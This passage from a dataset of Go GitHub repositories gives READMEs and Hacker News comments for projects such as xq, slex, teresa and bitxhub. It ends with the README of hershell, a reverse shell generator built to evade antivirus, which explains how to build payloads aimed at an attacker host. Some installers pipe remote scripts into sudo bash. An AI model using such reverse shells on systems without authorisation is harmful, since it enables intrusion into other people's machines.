Are the NS records set up correctly?\nAssuming you can make DNS lookups correctly when pointing dig at the DNS\nserver, try running `dig NS aws.example.com`. If this doesn't return anything,\nyou probably need to update your `NS` records. If you've already done this, you\nmight need to wait a few minutes for caches to clear.\n\n### Are you getting a warning about NS records in the logs but everything seems fine?\nThis happens when the `--hostname` parameter has been set or auto-detected to\nsomething different from what you've configured the `NS` records to be. This\nmay cause hard-to-debug issues, so you should set `--hostname` correctly.\n", "readme_type": "markdown", "hn_comments": "This is very cool! 
I love the idea of having a structured way to incorporate tags and roles into DNS aliases.However, since DNS is just about the most critical infrastructure service you can have, I want to point out that most of this can be accomplished nowadays with Route 53 internal DNS by syncing tags and roles into CNAMEs on Route 53.The difference to me is that even if your syncing daemon goes down, your DNS is still up (it's hard to imagine a situation where Route 53 is down without something even more fundamental being down on EC2).Need to add \"in Go\" to the title to get to the top of HN :-)What is the performance like? When you receive a DNS query for an instance that the API hasn't cached, what happens to the latency?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "meshplus/bitxhub", "link": "https://github.com/meshplus/bitxhub", "tags": ["blockchain", "interoperability", "relay-chain", "ibtp"], "stars": 556, "description": "Interchain protocol \u8de8\u94fe\u534f\u8bae", "lang": "Go", "repo_lang": "", "readme": "


\n\n![build](https://github.com/meshplus/bitxhub/workflows/build/badge.svg)\n[![codecov](https://codecov.io/gh/meshplus/bitxhub/branch/master/graph/badge.svg)](https://codecov.io/gh/meshplus/bitxhub)\n[![Go Report Card](https://goreportcard.com/badge/github.com/meshplus/bitxhub)](https://goreportcard.com/report/github.com/meshplus/bitxhub)\n\nBitXHub is committed to building a scalable, robust, and pluggable inter-blockchain\nreference implementation, that can provide reliable technical support for the formation\nof a blockchain internet and intercommunication of value islands.\n\n**For more details please visit our [documentation](https://docs.bitxhub.cn/) and [whitepaper](https://upload.hyperchain.cn/BitXHub%20Whitepaper.pdf) | [\u767d\u76ae\u4e66](https://upload.hyperchain.cn/BitXHub%E7%99%BD%E7%9A%AE%E4%B9%A6.pdf).**\n\n## Start\n\nBitXHub start script relies on [golang](https://golang.org/) and [tmux](https://github.com/tmux/tmux/wiki). Please\ninstall the software before start.\n\nUse commands below to clone the project:\n\n```shell\ngit clone git@github.com:meshplus/bitxhub.git\n```\n\nBitXHub also relies on some small tools, use commands below to install:\n\n```shell\ncd bitxhub\nbash scripts/prepare.sh \n```\n\nFinally, run the following commands to start a four nodes relay-chain.\n\n```shell\nmake cluster\n```\n\n**Noting:** `make cluster` will use `tmux` to split the screen. Thus, during commands processing, better not switch the terminal.\n\n## Playground\nSimply go to [BitXHub Document](https://meshplus.github.io/bitxhub/bitxhub/quick_start/) and follow the tutorials.\n\n\n## Contributing\n\nSee [CONTRIBUTING.md](https://github.com/meshplus/bitxhub/blob/master/CONTRIBUTING.md).\n\n## Contact\n\nEmail: bitxhub@hyperchain.cn\n\nWechat: If you\u2018re interested in BitXHub, please add the assistant to join our community group.\n\n\n\n## License\n\nThe BitXHub library (i.e. all code outside of the cmd and internal directory) is licensed under the GNU Lesser General Public License v3.0, also included in our repository in the COPYING.LESSER file.\n\nThe BitXHub binaries (i.e. all code inside of the cmd and internal directory) is licensed under the GNU General Public License v3.0, also included in our repository in the COPYING file.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "fatih/structtag", "link": "https://github.com/fatih/structtag", "tags": ["go", "structs", "tags"], "stars": 555, "description": "Parse and modify Go struct field tags", "lang": "Go", "repo_lang": "", "readme": "# structtag [![](https://github.com/fatih/structtag/workflows/build/badge.svg)](https://github.com/fatih/structtag/actions) [![PkgGoDev](https://pkg.go.dev/badge/github.com/fatih/structtag)](https://pkg.go.dev/github.com/fatih/structtag)\n\nstructtag provides a way of parsing and manipulating struct tag Go fields. It's used by tools like [gomodifytags](https://github.com/fatih/gomodifytags). For more examples, checkout [the projects using structtag](https://pkg.go.dev/github.com/fatih/structtag?tab=importedby).\n\n# Install\n\n```bash\ngo get github.com/fatih/structtag\n```\n\n# Example\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"reflect\"\n\t\"sort\"\n\n\t\"github.com/fatih/structtag\"\n)\n\nfunc main() {\n\ttype t struct {\n\t\tt string `json:\"foo,omitempty,string\" xml:\"foo\"`\n\t}\n\n\t// get field tag\n\ttag := reflect.TypeOf(t{}).Field(0).Tag\n\n\t// ... 
and start using structtag by parsing the tag\n\ttags, err := structtag.Parse(string(tag))\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\t// iterate over all tags\n\tfor _, t := range tags.Tags() {\n\t\tfmt.Printf(\"tag: %+v\\n\", t)\n\t}\n\n\t// get a single tag\n\tjsonTag, err := tags.Get(\"json\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tfmt.Println(jsonTag) // Output: json:\"foo,omitempty,string\"\n\tfmt.Println(jsonTag.Key) // Output: json\n\tfmt.Println(jsonTag.Name) // Output: foo\n\tfmt.Println(jsonTag.Options) // Output: [omitempty string]\n\n\t// change existing tag\n\tjsonTag.Name = \"foo_bar\"\n\tjsonTag.Options = nil\n\ttags.Set(jsonTag)\n\n\t// add new tag\n\ttags.Set(&structtag.Tag{\n\t\tKey: \"hcl\",\n\t\tName: \"foo\",\n\t\tOptions: []string{\"squash\"},\n\t})\n\n\t// print the tags\n\tfmt.Println(tags) // Output: json:\"foo_bar\" xml:\"foo\" hcl:\"foo,squash\"\n\n\t// sort tags according to keys\n\tsort.Sort(tags)\n\tfmt.Println(tags) // Output: hcl:\"foo,squash\" json:\"foo_bar\" xml:\"foo\"\n}\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "swaggo/echo-swagger", "link": "https://github.com/swaggo/echo-swagger", "tags": ["golang", "middleware", "swagger2", "echo", "echo-framework"], "stars": 555, "description": "echo middleware to automatically generate RESTful API documentation with Swagger 2.0.", "lang": "Go", "repo_lang": "", "readme": "# echo-swagger\n\necho middleware to automatically generate RESTful API documentation with Swagger 2.0.\n\n[![Build Status](https://github.com/swaggo/echo-swagger/actions/workflows/ci.yml/badge.svg?branch=master)](https://github.com/features/actions)\n[![Codecov branch](https://img.shields.io/codecov/c/github/swaggo/echo-swagger/master.svg)](https://codecov.io/gh/swaggo/echo-swagger)\n[![Go Report Card](https://goreportcard.com/badge/github.com/swaggo/echo-swagger)](https://goreportcard.com/report/github.com/swaggo/echo-swagger)\n[![Release](https://img.shields.io/github/release/swaggo/echo-swagger.svg?style=flat-square)](https://github.com/swaggo/echo-swagger/releases)\n\n\n## Usage\n\n### Start using it\n1. Add comments to your API source code, [See Declarative Comments Format](https://github.com/swaggo/swag#declarative-comments-format).\n2. Download [Swag](https://github.com/swaggo/swag) for Go by using:\n```sh\n$ go get -d github.com/swaggo/swag/cmd/swag\n\n# 1.16 or newer\n$ go install github.com/swaggo/swag/cmd/swag@latest\n```\n3. Run the [Swag](https://github.com/swaggo/swag) in your Go project root folder which contains `main.go` file, [Swag](https://github.com/swaggo/swag) will parse comments and generate required files(`docs` folder and `docs/doc.go`).\n```sh_ \"github.com/swaggo/echo-swagger/v2/example/docs\"\n$ swag init\n```\n4. 
Download [echo-swagger](https://github.com/swaggo/echo-swagger) by using:\n```sh\n$ go get -u github.com/swaggo/echo-swagger\n```\n\nAnd import following in your code:\n```go\nimport \"github.com/swaggo/echo-swagger\" // echo-swagger middleware\n```\n\n### Canonical example:\n\n```go\npackage main\n\nimport (\n\t\"github.com/labstack/echo/v4\"\n\t\"github.com/swaggo/echo-swagger\"\n\n\t_ \"github.com/swaggo/echo-swagger/example/docs\" // docs is generated by Swag CLI, you have to import it.\n)\n\n// @title Swagger Example API\n// @version 1.0\n// @description This is a sample server Petstore server.\n// @termsOfService http://swagger.io/terms/\n\n// @contact.name API Support\n// @contact.url http://www.swagger.io/support\n// @contact.email support@swagger.io\n\n// @license.name Apache 2.0\n// @license.url http://www.apache.org/licenses/LICENSE-2.0.html\n\n// @host petstore.swagger.io\n// @BasePath /v2\nfunc main() {\n\te := echo.New()\n\n\te.GET(\"/swagger/*\", echoSwagger.WrapHandler)\n\n\te.Logger.Fatal(e.Start(\":1323\"))\n}\n\n```\n\n5. Run it, and browser to http://localhost:1323/swagger/index.html, you can see Swagger 2.0 Api documents.\n\n![swagger_index.html](https://user-images.githubusercontent.com/8943871/36250587-40834072-1279-11e8-8bb7-02a2e2fdd7a7.png)\n\nNote: If you are using Gzip middleware you should add the swagger endpoint to skipper\n\n### Example\n\n```\ne.Use(middleware.GzipWithConfig(middleware.GzipConfig{\n\t\tSkipper: func(c echo.Context) bool {\n\t\t\tif strings.Contains(c.Request().URL.Path, \"swagger\") {\n\t\t\t\treturn true\n\t\t\t}\n\t\t\treturn false\n\t\t},\n\t}))\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "leanovate/gopter", "link": "https://github.com/leanovate/gopter", "tags": ["golang", "property-based-testing", "golang-property-tester"], "stars": 555, "description": "GOlang Property TestER", "lang": "Go", "repo_lang": "", "readme": "# GOPTER\n\n... the GOlang Property TestER\n[![Build Status](https://travis-ci.org/leanovate/gopter.svg?branch=master)](https://travis-ci.org/leanovate/gopter)\n[![codecov](https://codecov.io/gh/leanovate/gopter/branch/master/graph/badge.svg)](https://codecov.io/gh/leanovate/gopter)\n[![GoDoc](https://godoc.org/github.com/leanovate/gopter?status.png)](https://godoc.org/github.com/leanovate/gopter)\n[![Go Report Card](https://goreportcard.com/badge/github.com/leanovate/gopter)](https://goreportcard.com/report/github.com/leanovate/gopter)\n\n[Change Log](CHANGELOG.md)\n\n## Synopsis\n\nGopter tries to bring the goodness of [ScalaCheck](https://www.scalacheck.org/) (and implicitly, the goodness of [QuickCheck](http://hackage.haskell.org/package/QuickCheck)) to Go.\nIt can also be seen as a more sophisticated version of the testing/quick package.\n\nMain differences to ScalaCheck:\n\n* It is Go ... duh\n* ... nevertheless: Do not expect the same typesafety and elegance as in ScalaCheck.\n* For simplicity [Shrink](https://www.scalacheck.org/files/scalacheck_2.11-1.14.0-api/index.html#org.scalacheck.Shrink) has become part of the generators. They can still be easily changed if necessary.\n* There is no [Pretty](https://www.scalacheck.org/files/scalacheck_2.11-1.14.0-api/index.html#org.scalacheck.util.Pretty) ... so far gopter feels quite comfortable being ugly.\n* A generator for regex matches\n* No parallel commands ... yet?\n\nMain differences to the testing/quick package:\n\n* Much tighter control over generators\n* Shrinkers, i.e. 
automatically find the minimum value falsifying a property\n* A generator for regex matches (already mentioned that ... but it's cool)\n* Support for stateful tests\n\n## Documentation\n\nCurrent godocs:\n\n* [gopter](https://godoc.org/github.com/leanovate/gopter): Main interfaces\n* [gopter/gen](https://godoc.org/github.com/leanovate/gopter/gen): All commonly used generators\n* [gopter/prop](https://godoc.org/github.com/leanovate/gopter/prop): Common helpers to create properties from a condition function and specific generators\n* [gopter/arbitrary](https://godoc.org/github.com/leanovate/gopter/arbitrary): Helpers automatically combine generators for arbitrary types\n* [gopter/commands](https://godoc.org/github.com/leanovate/gopter/commands): Helpers to create stateful tests based on arbitrary commands\n* [gopter/convey](https://godoc.org/github.com/leanovate/gopter/convey): Helpers used by gopter inside goconvey tests\n\n## License\n\n[MIT Licence](http://opensource.org/licenses/MIT)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "sibprogrammer/xq", "link": "https://github.com/sibprogrammer/xq", "tags": ["terminal", "xml", "syntax-highlighting", "xpath", "html", "formatter"], "stars": 555, "description": "Command-line XML and HTML beautifier and content extractor", "lang": "Go", "repo_lang": "", "readme": "# xq\n\n[![build](https://github.com/sibprogrammer/xq/workflows/build/badge.svg)](https://github.com/sibprogrammer/xq/actions)\n[![Go Report Card](https://goreportcard.com/badge/github.com/sibprogrammer/xq)](https://goreportcard.com/report/github.com/sibprogrammer/xq)\n[![Codecov](https://codecov.io/gh/sibprogrammer/xq/branch/master/graph/badge.svg?token=G6QX77SQOH)](https://codecov.io/gh/sibprogrammer/xq)\n[![Homebrew](https://img.shields.io/badge/dynamic/json.svg?url=https://formulae.brew.sh/api/formula/xq.json&query=$.versions.stable&label=homebrew)](https://formulae.brew.sh/formula/xq)\n[![Macports](https://repology.org/badge/version-for-repo/macports/xq-sibprogrammer.svg)](https://repology.org/project/xq-sibprogrammer/versions)\n\nCommand-line XML and HTML beautifier and content extractor.\n\n![xq](./assets/images/screenshot.png?raw=true)\n\n# Features\n\n* Syntax highlighting\n* Automatic indentation and formatting\n* Automatic pagination\n* Node content extraction\n\n# Usage\n\nFormat an XML file and highlight the syntax:\n\n```\nxq test/data/xml/unformatted.xml\n```\n\n`xq` also accepts input through `stdin`:\n\n```\ncurl -s https://www.w3schools.com/xml/note.xml | xq\n```\n\nHTML content can be formatted and highlighted as well (using `-m` flag):\n\n```\nxq -m test/data/html/formatted.html\n```\n\nIt is possible to extract the content using XPath query language.\n`-x` parameter accepts XPath expression.\n\nExtract the text content of all nodes with `city` name:\n\n```\ncat test/data/xml/unformatted.xml | xq -x //city\n```\n\nExtract the value of attribute named `status` and belonging to `user`:\n\n```\ncat test/data/xml/unformatted.xml | xq -x /user/@status\n```\n\nSee https://en.wikipedia.org/wiki/XPath for details.\n\nIt is possible to use CSS selector to extract the content as well:\n\n```\ncat test/data/html/unformatted.html | xq -q \"body > p\"\n```\n\n# Installation\n\nThe preferable ways to install the utility are described below.\n\nFor macOS, via [Homebrew](https://brew.sh):\n```\nbrew install xq\n```\n\nFor macOS, via [MacPorts](https://www.macports.org):\n```\nsudo port install 
xq\n```\n\nFor Linux using custom installer:\n```\ncurl -sSL https://bit.ly/install-xq | sudo bash\n```\n\nFor Ubuntu 22.10 or higher via package manager:\n```\napt-get install xq\n```\n\nFor Fedora via package manager:\n```\ndnf install xq\n```\n\nIf you have Go toolchain installed, you can use the following command to install `xq`:\n```\ngo install github.com/sibprogrammer/xq@latest\n```\n", "readme_type": "markdown", "hn_comments": "I got the best questions that are in demand from JavaScript one of the most languages out there and if you can solve these questions you can get your job, but if you can't they provide you free courses step by step it depends on your level in order to become a programmer and good luck :)\nLearn more: https://javascript.spread.namexmllint --format -xsltprocSo there are now approximately 1 million command line tools with various overlapping feature sets for extracting data from XML, JSON, YAML, TOML, and CSV-like delimited data. Is anyone ambitious enough to have constructed a feature matrix for all of them? Is there even a complete list out there?I wonder if this space of tools is a bit like static site generators: it's almost as easy to write your own as it is to learn somebody else's.Neat! Like Jq but for XML and HTML.Have you considered adding css sectors as an alternative to xpath? For many simple things a css selector is easer to write and more people already know them.I believe it's possible to translate css selectors to xpath so it wouldn't need another selection engine.There's an ancient formatter I've been using for years (gasp, probably well over a decade) https://xml-coreutils.sourceforge.net/ ... xml-fmt (https://xml-coreutils.sourceforge.net/xml-fmt_man.html)It'll be nice to try something new. swiss army style command line XML tools has been pretty neglected.There is also hred \nhttps://github.com/danburzo/hredWhich extracts XML and HTML as JSON.Also cool: \nhttps://github.com/dbohdan/structured-text-tools/ \n\"A list of command line tools for manipulating structured text data\"There is also yq [1], which attempts the same for yaml, toml and xml. (And confusingly also contains a binary named \"xq\" for the xml part - however, it uses jq for querying instead of xpath)[1] https://github.com/kislyuk/yqThis is awesome. Hugo has been missing a tidy feature for a long time. I hope they use this to implement it finally or that the author might even consider creating a PR.related discussion, orthogonally:JC \u2013 JSONifies the output of many CLI toolshttps://news.ycombinator.com/item?id=33448204 2022-11-03doesn't seem to work great with https://ap-playerservices.streamtheworld.com/api/livestream?station=NOVA_919&version=1.9\n\nso xqilla and learning xlst et al still seems like my to-go for complex documentsShoutout to my go-to: https://github.com/EricChiang/pup#readme (also golang) and my 2nd favorite https://xmlstar.sourceforge.net/Looks good! Does the xpath expression support XML namespaces?What would be the differences to lxml/beautifulsoup/etc.? 
curl https://news.ycombinator.com/ | xq\n\nyields: Hacker NewsXML syntax error on line 4: element closed by \n1", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "luizalabs/teresa", "link": "https://github.com/luizalabs/teresa", "tags": ["kubernetes", "go", "paas", "hacktoberfest"], "stars": 555, "description": "Open source tool to deploy apps to Kubernetes clusters", "lang": "Go", "repo_lang": "", "readme": "# Teresa\n[![Release](https://img.shields.io/github/release/luizalabs/teresa.svg?style=flat-square)](https://github.com/luizalabs/teresa/releases/latest)\n[![Software License](https://img.shields.io/badge/license-apache-brightgreen.svg?style=flat-square)](/LICENSE.md)\n[![Build Status](https://img.shields.io/travis/luizalabs/teresa/master.svg?style=flat-square)](https://travis-ci.org/luizalabs/teresa)\n[![codecov](https://img.shields.io/codecov/c/github/luizalabs/teresa/master.svg?style=flat-square\")](https://codecov.io/gh/luizalabs/teresa)\n[![Go Report Card](https://goreportcard.com/badge/github.com/luizalabs/teresa?style=flat-square)](https://goreportcard.com/report/github.com/luizalabs/teresa)\n\nTeresa is an extremely simple platform as a service that runs on top of [Kubernetes](https://github.com/kubernetes/kubernetes).\nIt uses a client-server model: the client sends high level commands (create application, deploy, etc.) to the server, which translates them to the Kubernetes API.\n\n## Client Installation\n\n### Download (recommended)\n\nThis is the best way to get the latest release.\n\n- Access https://github.com/luizalabs/teresa/releases\n- Download the latest release for your OS. Eg: `teresa-linux-amd64`\n- Rename the download file to `teresa`. Eg: `mv teresa-linux-amd64 teresa`\n- Make it an executable. Eg: `chmod +x teresa`\n- Move it to the `bin` folder. Eg: `sudo mv teresa /usr/bin`\n\nThen you're good to go :slightly_smiling_face: ! 
`teresa` should now be available to use on your terminal.\n\n### Homebrew\n\nRun the following in your command-line:\n\n```sh\n$ brew tap luizalabs/teresa-cli\n$ brew install teresa\n```\n\n### Snap\n\nRun the following in your command-line:\n\n```sh\n$ sudo snap install teresa-cli\n```\n\n## Server Installation\n\nServer requirements:\n\n- Kubernetes cluster (>= 1.9)\n\n- database backend to store users and teams (SQLite or MySQL)\n\n- storage for build artifacts (AWS S3 or minio)\n\n- rsa keys for token signing\n\n- (optional) TLS encryption key and certificate\n\nThe recommended installation method uses the [helm](https://github.com/kubernetes/helm) package manager,\nfor instance to install using S3 and MySQL (recommended):\n\n $ openssl genrsa -out teresa.rsa\n $ export TERESA_RSA_PRIVATE=`base64 -w0 teresa.rsa`\n $ openssl rsa -in teresa.rsa -pubout > teresa.rsa.pub\n $ export TERESA_RSA_PUBLIC=`base64 -w0 teresa.rsa.pub`\n $ helm repo add luizalabs http://helm.k8s.magazineluiza.com\n $ helm install luizalabs/teresa \\\n --namespace teresa \\\n --set rsa.private=$TERESA_RSA_PRIVATE \\\n --set rsa.public=$TERESA_RSA_PUBLIC \\\n --set aws.key.access=xxxxxxxx \\\n --set aws.key.secret=xxxxxxxx \\\n --set aws.region=us-east-1 \\\n --set aws.s3.bucket=teresa \\\n --set db.name=teresa \\\n --set db.hostname=dbhostname \\\n --set db.username=teresa \\\n --set db.password=xxxxxxxx \\\n --set rbac.enabled=true\n\n\nLook [here](./helm/README.md) for more information about helm options.\n\nYou need to create an admin user to perform [user and team management](./FAQ.md#administration):\n\n $ export POD_NAME=$(kubectl get pods -n teresa -l \"app=teresa\" -o jsonpath=\"{.items[0].metadata.name}\")\n $ kubectl exec $POD_NAME -it -n teresa -- ./teresa-server create-super-user --email admin@email.com --password xxxxxxxx\n\n## QuickStart\n\nRead the first sections of the [FAQ](./FAQ.md).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "clangcn/ngrok-one-key-install", "link": "https://github.com/clangcn/ngrok-one-key-install", "tags": [], "stars": 555, "description": "ngrok one key install shell(http://soft.clang.cn/ngrok/install_ngrok.sh)", "lang": "Go", "repo_lang": "", "readme": "#Ngrok\u670d\u52a1\u5668\u4e00\u952e\u5b89\u88c5\u811a\u672c\u3010\u652f\u6301\u7528\u6237\u7ba1\u7406\u3011\uff08\u7a7f\u900fDDNS\uff09\n\n##\u5728\u6b64\u975e\u5e38\u611f\u8c22[koolshare](http://koolshare.cn/forum-72-1.html)\u7684[\u5c0f\u5b9d](http://koolshare.cn/space-uid-2380.html)\u5b9d\u5927\u5bf9ngrok\u8fdb\u884c\u7684\u4e8c\u6b21\u5f00\u53d1\uff0c\u8ba9\u6211\u7b49\u53ef\u4ee5\u7528\u4e0a\u975e\u5e38\u597d\u7528\u7684\u7a0b\u5e8f\uff0c\u540c\u65f6\u611f\u8c22[woaihsw](http://koolshare.cn/space-uid-13735.html)\u5728\u811a\u672c\u5236\u4f5c\u4e2d\u63d0\u4f9b\u7684\u5e2e\u52a9\u3002\n\n\u811a\u672c\u662f\u4e1a\u4f59\u7231\u597d\uff0c\u82f1\u6587\u5c5e\u4e8e\u6587\u76f2\uff0c\u5199\u7684\u4e0d\u597d\uff0c\u4e0d\u8981\u7b11\u8bdd\u6211\uff0c\u6b22\u8fce\u60a8\u6279\u8bc4\u6307\u6b63\u3002\n\u5b89\u88c5\u5e73\u53f0\uff1aCentOS\u3001Debian\u3001Ubuntu\u3002\nServer\n------\n### Install\n\u6267\u884c\u547d\u4ee4\uff1a\n```Bash\nwget --no-check-certificate https://github.com/clangcn/ngrok-one-key-install/raw/master/install_ngrok.sh -O ./install_ngrok.sh\nchmod 500 ./install_ngrok.sh\n./install_ngrok.sh install\t\n```\n### \u670d\u52a1\u5668\u7ba1\u7406\n\n\tUsage: /etc/init.d/ngrokd 
{start|stop|restart|status|config|adduser|deluser|userlist|info}\n\tUsage: /etc/init.d/ngrokd deluser {username}\n\n~~*### Compile and install it yourself*~~\n\n~~*Run the commands:*~~\n~~*wget --no-check-certificate https://github.com/clangcn/ngrok-one-key-install/raw/master/ngrok_install.sh -O ./ngrok_install.sh*~~\n~~*chmod 500 ./ngrok_install.sh*~~\n~~*./ngrok_install.sh*~~\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "iost-official/go-iost", "link": "https://github.com/iost-official/go-iost", "tags": ["blockchain", "iost", "smart-contracts", "dapp"], "stars": 555, "description": "Official Go implementation of the IOST blockchain", "lang": "Go", "repo_lang": "", "readme": "# IOST - A Scalable & Developer Friendly Blockchain \n\nIOST is a smart contract platform focusing on performance and developer friendliness. \n\n# Features\n\n1. The V8 JavaScript engine is integrated inside the blockchain, so you can use JavaScript to write smart contracts!\n2. The blockchain is highly scalable with thousands of TPS. Meanwhile it still has a more decentralized consensus than DPoS.\n3. 0.5 second block, 0.5 minute finality.\n4. Free transactions. You can stake coins to get gas.\n\n# Development\n\n### Environments\n\nOS: Ubuntu 18.04 or later \nGo: 1.18 or later\n\nIOST node uses CGO V8 javascript engine, so only x64 is supported now.\n\n### Deployment\n\nbuild local binary: `make build` \nstart a local devnet: `make debug` \nbuild docker: `make image` \n\n\nFor documentation, please visit: [IOST Developer](https://developers.iost.io)\n\nWelcome to our [tech community at telegram](https://t.me/iostdev)\n\nHappy hacking!\n\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "nivin-studio/go-zero-mall", "link": "https://github.com/nivin-studio/go-zero-mall", "tags": [], "stars": 555, "description": "go-zero in action: let your microservices Go", "lang": "Go", "repo_lang": "", "readme": "# go-zero in action: let your microservices Go\nThis is the sample code for a `go-zero` introductory tutorial; the tutorial is at [go-zero in action: let your microservices Go](https://juejin.cn/post/7036011047391592485).\n\nFor the `DTM` distributed transaction sample code, please switch to the [dtm](https://github.com/nivin-studio/go-zero-mall/tree/dtm) branch.\n\n## Usage\n\n### 1. Install the local `docker` development environment\nDownload the [gonivinck](https://github.com/nivin-studio/gonivinck) local development environment.\n\n### 2. Create the database\nAddress: `127.0.0.1:3306`\n\nUser: `root`\n\nPassword: `123456`\n\nCreate the database `mall`\n\nCreate the tables `user`, `product`, `order`, `pay`\n\nThe `SQL` statements are under the `service/[user,product,order,pay]/model` directories.\n\n> Note: if you change the mysql configuration in gonivinck, please use your modified port, account, and password when connecting to the database.\n\n### 3. 
Start the project\nDownload this project, put the project code in the local directory that the `gonivinck` setting `CODE_PATH_HOST` points to, enter the `golang` container, and run the project code.\n\n#### 3.1 Enter the `golang` container\n~~~bash\n$ docker exec -it gonivinck_golang_1 bash\n~~~\n\n#### 3.2 Use the `nivin` command-line tool\n\n- nivin install\nInstalls the project dependencies.\n\n~~~bash\n$ ./nivin install\n~~~\n\n- nivin start [rpc|api] [service_name]\nStarts a service: creates a service session and starts the corresponding service.\n \n~~~bash\n$ ./nivin start rpc user\n~~~\n\n~~~bash\n$ ./nivin start api user\n~~~\n\n- nivin stop [rpc|api] [service_name]\nStops a service: deletes the corresponding service session.\n \n~~~bash\n$ ./nivin stop rpc user\n~~~\n\n~~~bash\n$ ./nivin stop api user\n~~~\n\n- nivin info [rpc|api] [service_name]\nInspects a service: attaches to the session terminal of the service to view its runtime logs.\n\n~~~bash\n$ ./nivin info rpc user\n~~~\n\n~~~bash\n$ ./nivin info api user\n~~~\n\n> Note: use the ctrl+a+d key combination to detach from the session without stopping the service running inside it.\n\n- nivin ls\nLists the service sessions that have been started.\n \n~~~bash\n$ ./nivin ls\n~~~\n\n\n## Acknowledgements\n\n- [go-zero](https://github.com/zeromicro/go-zero)\n- [DTM](https://github.com/dtm-labs/dtm)", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "crosbymichael/slex", "link": "https://github.com/crosbymichael/slex", "tags": ["ssh", "multiplexing"], "stars": 554, "description": "SSH multiplex", "lang": "Go", "repo_lang": "", "readme": "## SLEX\n\n[![Build Status](https://travis-ci.org/crosbymichael/slex.svg?branch=master)](https://travis-ci.org/crosbymichael/slex)\n\nslex is a simple binary that allows you to run a command on multiple hosts via SSH.\nIt is very similar to fabric except that it is written in Go so you don't have to \nhave python installed on your system and you don't *have* to write a script or \nconfiguration files if you do not want to.\n\n## Building\n\nTo build `slex` you must have a working Go install then you can run:\n\n```bash\ngo get -u github.com/crosbymichael/slex\n```\n\n```bash\nslex -h\nNAME:\n slex - SSH commands multiplexed\n\nUSAGE:\n slex [global options] command [command options] [arguments...]\n\nVERSION:\n 1\n\nAUTHOR:\n @crosbymichael - \n\nCOMMANDS:\n help, h Shows a list of commands or help for one command\n\nGLOBAL OPTIONS:\n --debug enable debug output for the logs\n --host value SSH host address\n --hosts value file containing host addresses separated by a new line\n --user value, -u value user to execute the command as (default: \"root\")\n --identity value, -i value SSH identity to use for connecting to the host\n --option value, -o value SSH client option\n --agent, -A Forward authentication request to the ssh agent\n --env value, -e value set environment variables for SSH command\n --quiet, -q disable output from the ssh command\n --help, -h show help\n 
--version, -v print the version\n\n```\n\nFor the list of supported SSH client option, see `SSHClientOptions` on [config.go](https://github.com/crosbymichael/slex/blob/master/config.go)\n\n### Get the uptime for all servers\n```bash\nslex --host 192.168.1.3 --host 192.168.1.4 uptime\n[192.168.1.3:22] 01:05:20 up 4:44, 0 users, load average: 0.35, 0.39, 0.33\n[192.168.1.4:22] 01:05:20 up 9:45, 0 users, load average: 0.04, 0.07, 0.06\n```\n\n### Run a docker container on all servers\n```bash\nslex --host 192.168.1.3 --host 192.168.1.4 docker run --rm busybox echo \"hi slex\"\n[192.168.1.3:22] hi slex\n[192.168.1.4:22] hi slex\n```\n\n### Pipe scripts to all servers\n```bash\necho \"echo hi again\" | slex --host 192.168.1.3 --host 192.168.1.4\n[192.168.1.3:22] hi again\n[192.168.1.4:22] hi again\n```\n\n#### License - MIT\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "lesnuages/hershell", "link": "https://github.com/lesnuages/hershell", "tags": ["security", "exploit", "reverse-shell"], "stars": 554, "description": "Multiplatform reverse shell generator", "lang": "Go", "repo_lang": "", "readme": "# Hershell\n\nSimple TCP reverse shell written in [Go](https://golang.org).\n\nIt uses TLS to secure the communications, and provide a certificate public key fingerprint pinning feature, preventing from traffic interception.\n\nSupported OS are:\n\n- Windows\n- Linux\n- Mac OS\n- FreeBSD and derivatives\n\n## Why ?\n\nAlthough meterpreter payloads are great, they are sometimes spotted by AV products.\n\nThe goal of this project is to get a simple reverse shell, which can work on multiple systems.\n\n## How ?\n\nSince it's written in Go, you can cross compile the source for the desired architecture.\n\n## Getting started & dependencies\n\nAs this is a Go project, you will need to follow the [official documentation](https://golang.org/doc/install) to set up\nyour Golang environment (with the `$GOPATH` environment variable).\n\nThen, just run `go get github.com/lesnuages/hershell` to fetch the project.\n\n### Building the payload\n\nTo simplify things, you can use the provided Makefile.\nYou can set the following environment variables:\n\n- ``GOOS`` : the target OS\n- ``GOARCH`` : the target architecture\n- ``LHOST`` : the attacker IP or domain name\n- ``LPORT`` : the listener port\n\nFor the ``GOOS`` and ``GOARCH`` variables, you can get the allowed values [here](https://golang.org/doc/install/source#environment).\n\nHowever, some helper targets are available in the ``Makefile``:\n\n- ``depends`` : generate the server certificate (required for the reverse shell)\n- ``windows32`` : builds a windows 32 bits executable (PE 32 bits)\n- ``windows64`` : builds a windows 64 bits executable (PE 64 bits)\n- ``linux32`` : builds a linux 32 bits executable (ELF 32 bits)\n- ``linux64`` : builds a linux 64 bits executable (ELF 64 bits)\n- ``macos32`` : builds a mac os 32 bits executable (Mach-O)\n- ``macos64`` : builds a mac os 64 bits executable (Mach-O)\n\nFor those targets, you just need to set the ``LHOST`` and ``LPORT`` environment variables.\n\n### Using the shell\n\nOnce executed, you will be provided with a remote shell.\nThis custom interactive shell will allow you to execute system commands through `cmd.exe` on Windows, or `/bin/sh` on UNIX 